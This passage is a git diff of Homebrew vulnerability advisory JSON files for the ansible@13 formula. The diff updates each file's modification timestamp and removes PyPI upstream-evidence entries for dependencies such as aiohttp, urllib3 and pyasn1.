b/advisories/BREW-ansible@13-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69227", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69228.json b/advisories/BREW-ansible@13-CVE-2025-69228.json index b87403c748..d8c3251926 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69228.json +++ b/advisories/BREW-ansible@13-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69228", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69229.json b/advisories/BREW-ansible@13-CVE-2025-69229.json index 8c566c5861..f60ad0c275 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69229.json +++ b/advisories/BREW-ansible@13-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69229", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69230.json b/advisories/BREW-ansible@13-CVE-2025-69230.json index 112ffea1e9..d583c0dd23 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69230.json +++ b/advisories/BREW-ansible@13-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69230", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2025-69277.json b/advisories/BREW-ansible@13-CVE-2025-69277.json index 2eda615a1a..fc0b7f1a0f 100644 --- a/advisories/BREW-ansible@13-CVE-2025-69277.json +++ b/advisories/BREW-ansible@13-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2025-69277", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-11332.json b/advisories/BREW-ansible@13-CVE-2026-11332.json index 038ce9a5e8..bbd919e074 100644 --- a/advisories/BREW-ansible@13-CVE-2026-11332.json +++ b/advisories/BREW-ansible@13-CVE-2026-11332.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-11332", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w8p5-mx5w-cpqj", "CVE-2026-11332", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-21441.json b/advisories/BREW-ansible@13-CVE-2026-21441.json index 780ad2fd47..206f21b118 100644 --- a/advisories/BREW-ansible@13-CVE-2026-21441.json +++ b/advisories/BREW-ansible@13-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-21441", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-22815.json b/advisories/BREW-ansible@13-CVE-2026-22815.json index 7eba5603a3..3427747499 100644 --- a/advisories/BREW-ansible@13-CVE-2026-22815.json +++ b/advisories/BREW-ansible@13-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-22815", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-23490.json b/advisories/BREW-ansible@13-CVE-2026-23490.json index e5ec622d8f..ccff9bc206 100644 --- a/advisories/BREW-ansible@13-CVE-2026-23490.json +++ b/advisories/BREW-ansible@13-CVE-2026-23490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-23490", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-17T16:54:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63vm-454h-vhhq", "CVE-2026-23490", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-25645.json b/advisories/BREW-ansible@13-CVE-2026-25645.json index 930f5c36ab..788dd8ceb0 100644 --- a/advisories/BREW-ansible@13-CVE-2026-25645.json +++ b/advisories/BREW-ansible@13-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-25645", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-30922.json b/advisories/BREW-ansible@13-CVE-2026-30922.json index 0b90304fd3..fd590a49fe 100644 --- a/advisories/BREW-ansible@13-CVE-2026-30922.json +++ b/advisories/BREW-ansible@13-CVE-2026-30922.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-30922", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jr27-m4p2-rc6r", "CVE-2026-30922", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -85,10 +77,6 @@ "type": "WEB", "url": "https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0" }, - { - "type": "WEB", - "url": "https://access.redhat.com/errata/RHSA-2026:10184" - }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:22970" @@ -117,6 +105,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6309" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:65126" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:6568" @@ -165,6 +157,10 @@ "type": "WEB", "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-30922.json" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:10184" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:12176" diff --git a/advisories/BREW-ansible@13-CVE-2026-34513.json b/advisories/BREW-ansible@13-CVE-2026-34513.json index cdf4b4573c..27bc6b925d 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34513.json +++ b/advisories/BREW-ansible@13-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34513", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34514.json b/advisories/BREW-ansible@13-CVE-2026-34514.json index 28f978298e..17299b43df 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34514.json +++ b/advisories/BREW-ansible@13-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34514", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34515.json b/advisories/BREW-ansible@13-CVE-2026-34515.json index 4095cb15b6..29c5511310 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34515.json +++ b/advisories/BREW-ansible@13-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34515", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34516.json b/advisories/BREW-ansible@13-CVE-2026-34516.json index 10606fba19..99da478b79 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34516.json +++ b/advisories/BREW-ansible@13-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34516", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34517.json b/advisories/BREW-ansible@13-CVE-2026-34517.json index 886f290acb..da90fbb491 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34517.json +++ b/advisories/BREW-ansible@13-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34517", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34518.json b/advisories/BREW-ansible@13-CVE-2026-34518.json index 1c0554f63d..3dc20d6b1c 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34518.json +++ b/advisories/BREW-ansible@13-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34518", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34519.json b/advisories/BREW-ansible@13-CVE-2026-34519.json index 38bfe5d1dc..2f50b0d5f0 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34519.json +++ b/advisories/BREW-ansible@13-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34519", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34520.json b/advisories/BREW-ansible@13-CVE-2026-34520.json index cc8c354c28..598658acaf 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34520.json +++ b/advisories/BREW-ansible@13-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34520", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34525.json b/advisories/BREW-ansible@13-CVE-2026-34525.json index c3148a4fca..b71b0c0902 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34525.json +++ b/advisories/BREW-ansible@13-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34525", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-34993.json b/advisories/BREW-ansible@13-CVE-2026-34993.json index afa60ffbde..655f917538 100644 --- a/advisories/BREW-ansible@13-CVE-2026-34993.json +++ b/advisories/BREW-ansible@13-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-34993", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-41066.json b/advisories/BREW-ansible@13-CVE-2026-41066.json index 66ee7e088b..31433ee379 100644 --- a/advisories/BREW-ansible@13-CVE-2026-41066.json +++ b/advisories/BREW-ansible@13-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-41066", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44405.json b/advisories/BREW-ansible@13-CVE-2026-44405.json index 3315b26ebd..b726e6556b 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44405.json +++ b/advisories/BREW-ansible@13-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44405", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44431.json b/advisories/BREW-ansible@13-CVE-2026-44431.json index 3604b54404..5d79746272 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44431.json +++ b/advisories/BREW-ansible@13-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44431", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-44432.json b/advisories/BREW-ansible@13-CVE-2026-44432.json index 6777bb6cae..a060946a08 100644 --- a/advisories/BREW-ansible@13-CVE-2026-44432.json +++ b/advisories/BREW-ansible@13-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-44432", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-4539.json b/advisories/BREW-ansible@13-CVE-2026-4539.json index bd60c07be1..280ab4292a 100644 --- a/advisories/BREW-ansible@13-CVE-2026-4539.json +++ b/advisories/BREW-ansible@13-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-4539", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-45409.json b/advisories/BREW-ansible@13-CVE-2026-45409.json index 974ee63f72..acadbfa74e 100644 --- a/advisories/BREW-ansible@13-CVE-2026-45409.json +++ b/advisories/BREW-ansible@13-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-45409", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-47265.json b/advisories/BREW-ansible@13-CVE-2026-47265.json index 1cbfb9150a..5672590bb5 100644 --- a/advisories/BREW-ansible@13-CVE-2026-47265.json +++ b/advisories/BREW-ansible@13-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-47265", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-50269.json b/advisories/BREW-ansible@13-CVE-2026-50269.json index 7e736c3ae7..59d7c03c95 100644 --- a/advisories/BREW-ansible@13-CVE-2026-50269.json +++ b/advisories/BREW-ansible@13-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-50269", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54273.json b/advisories/BREW-ansible@13-CVE-2026-54273.json index 2917f504e6..df38dee747 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54273.json +++ b/advisories/BREW-ansible@13-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54273", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54274.json b/advisories/BREW-ansible@13-CVE-2026-54274.json index b8cbbaab65..19c6066a93 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54274.json +++ b/advisories/BREW-ansible@13-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54274", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54275.json b/advisories/BREW-ansible@13-CVE-2026-54275.json index a4d67747b6..d3922c7798 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54275.json +++ b/advisories/BREW-ansible@13-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54275", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2026-54276.json b/advisories/BREW-ansible@13-CVE-2026-54276.json index 22025e539a..120f511057 100644 --- a/advisories/BREW-ansible@13-CVE-2026-54276.json +++ b/advisories/BREW-ansible@13-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2026-54276", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", 